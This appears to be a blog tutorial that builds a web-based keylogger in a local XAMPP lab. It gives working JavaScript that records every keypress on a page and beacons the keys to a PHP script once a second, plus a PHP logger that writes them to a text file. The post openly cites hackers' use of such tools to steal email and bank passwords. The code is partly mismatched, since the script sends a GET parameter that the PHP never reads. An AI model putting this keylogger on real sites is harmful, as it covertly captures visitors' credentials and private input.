Documentation on keylogger

Documentation on keylogger


Introduction:-
Keylogger is a type of software that once installed on a system, has capability to record every keystroke made by the system. All the recorded keystroke is saved in a log file. A keylogger can record message,email,and capture any type of information you type at any time using your keyboard.

Who uses keylogger?:-
Keylogger is a surveillance tool,used by employers to ensure employee use work computers for business purposes only. There’s also a growing market of parents who want to use this tools to stay informed about a child’s online activities. But now a days this tools is use by hacker for hacking email id’s and confidential information of the user like password and id of the bank account,this is one of the easiest way of hacking the ID’s,because keylogger is a device or a software while gives all the information that which key is typed by the user and through this software hackers hack the ID’s easily.   

About keylogger:-
It is the example of the simple web based keylogger, In this documentation you will know how keylogger works,type of programming by which we records and monitor each and every keystroke type by the user in your site.

How it works:-
Very first We have to create environment for practical and follow the steps which i mention in details below:-

Lab environment:-
Operating system:-window xp
Testing website:-car.html
Web server:-xampp
Text editor:-sublime text 3

Step 1:-
Create a testing webpage car.html. I copy the source code of the http://testphp.vulnweb.com/  website(you can also copy or  make your own html page according to your need) and do some manipulation according to my need. After manipulation you can see below how it is look:-  
Step 2:-
Write a Code which will be inside the code.js.
var keys=''; // declaring a javascript variable to store each keystroke
document.onkeypress = function(e)// calling the function to execute whenever a keystroke is there on html document
{
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode; //get character code
key = String.fromCharCode(key); // convert it to string
keys+=key; // append current character to previous one (concatinate)
}
window.setInterval(function(){
new Image().src = '/keylogger.php?c='+keys; // sending data as get request by creating a new image
keys = '';
}, 1000);// set interval to execute function continuously

Step 3:-
Create a keylogger.php file
Code which is inside the keylogger.php
<?php
$abc=$_POST['searchFor'];  //creating a variable “abc” and saving the data text box into it.
$logfile = fopen('data.txt', 'a+');//open file data.txt in append mode  
fwrite($logfile, $abc);// writing the content of abc into data.txt
fclose($logfile);//close the file data.txt
?>

Step 4:-
Create a text file data.txt in the same directory in which no code is required. In which We will get the keystroke which is type by the user or who serve the website.

Step 5:-
Open xampp file in the C:/ drive then click on htdocs and make a new folder of any name i give name to that folder is dir and paste all the files inside it which i make above(car.html,code.js,data.txt,keyboard-966308_1280.jpg,keylogger.php).
Step 6:-
Write the path of the code.js inside our testing web page(car.html).

Step 7:-
open xampp control and start Apache and Mysql for hosting my testing webpage.

Step 8:-
Open testing webpage in our localhost by typing 127.0.0.1/dir/car.html in url then we have a testing website in front of us and user type in the text field and click on go after clicking whatever user type inside the text field we get all the keystroke enter by the person in the data.txt file.



Steps 9:-
Goto to the data.txt file and you see all the keystroke which is enter by the user.

Video POC link:-
In this link you will get the each and every steps follow by me in details.

Comments

Popular posts from this blog

POC of Nagios XI 5.2.6-5.4.12 -Chained Remote Code Execution(Metasploit) | CVE-2018-8733

POC On Sam Decryption

What is .crypt12 file extension?